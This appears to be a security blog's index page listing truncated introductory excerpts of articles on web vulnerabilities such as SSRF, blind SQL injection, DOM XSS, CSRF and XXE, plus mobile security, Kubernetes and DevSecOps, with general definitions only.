Ctrl + Alt + Security

OWASP – Security Misconfiguration

Overview: Security misconfigurations are security controls that are inaccurately configured or left insecure, putting your systems and data at risk such as any poorly documented configuration changes, or a technical issue across any component in your endpoints and default settings. We can detect security misconfigurations in web applications using following test cases: 1)  EXPOSED FILES…
Read more


SSRF Explained

The SSRF error occurs whenever the web application fetches a remote resource without validating the user-supplied URL. It allows an attacker to force an application to send a specially crafted request to an unwanted destination, even when protected by a firewall, VPN, or network access control list (ACL) type. As modern web applications provide end…
Read more

blind sql injection

How to Blind SQL Injection?

What is Blind SQL Injection? The word “Blind” here refers to “No error message when suffered by an injection attack”. Thus, it is more difficult to exploit. It returns information, when the application is exploited with SQL payloads that return a ‘true or false’ response from the server. By observing the response, an attacker can…
Read more

mobile application security

Are your Apps Secure? An End to End Guide for Mobile Application Security

Mobile Application Security When we were an agrarian nation, all cars were trucks, because that’s what you needed on the farm. But as vehicles started to be used in the urban centers, cars got more popular … PCs are going to be like trucks. Less people are gonna need them and this is going to…
Read more


Ruby Based SQL Injection

Hi Readers, I sat to pen down regarding SQL Injection. Being the topmost finding in OWASP’s top 10, the definition and description of SQL Injection and many exercises for hands-on are available online, one being PORT SWIGGGER LABS. I’ve come across SQL injection in a RUBY ON RAILS code which made me share few points regarding…
Read more

dom xss

A Beginner Guide to DOM Based XSS

What is DOM? DOM XSS stands for Document Object Model-based Cross-site Scripting. A DOM-based XSS attack is possible when the web application writes data to the DOM without proper sanitization. Its interface gives developers the ability to access the web application and manipulate it by executing operations. The attacker can manipulate the data to include XSS…
Read more

crsf attack

A Tale of Cross Site Request Forgery (CSRF)

What is CSRF ? Cross-site request forgery (CSRF) is a common web security vulnerability. It’s also known as XSRF, Sea surf, session riding, Cross-site reference forgery, and Hostile linking. The Successful CSRF vulnerability can have serious consequences that the Open Web Application Security Project (OWASP-2013) has included it in its top 10 vulnerabilities list. CSRF attack…
Read more

XXE Attack

What are XXE(XML External Entity) Attacks?

What is XXE? XXE stands for XML EXTERNAL ENTITY. Before learning about XXE let’s dive in to know about how the HTML document types are defined and what is DTD. What is DTD? DTD is nothing but the abbreviated form of Document Type Definition which defines the structure and the attributes of an XML document.…
Read more


Kubernetes is Here & There

In Present days, container-based microservice architectures have drastically changed the way development and operations teams (DevOps) work, test and deploy applications. Containers help organizations to scale and deploy applications on the fly, but containers have also brought the organizations new additional challenges and complexity. Many businesses are now deploying lots of containers daily as it…
Read more

DevSecOps Pipeline

DevSecOps is a culture shift in the IT industry that aims to Integrate Security into the rapid software release cycles that are very significant in modern application development and deployment, also known as DevOps. Embracing this shift-left methodology requires organizations to bridge the gap that exists between Developers and Security Analysts to the point where…
Read more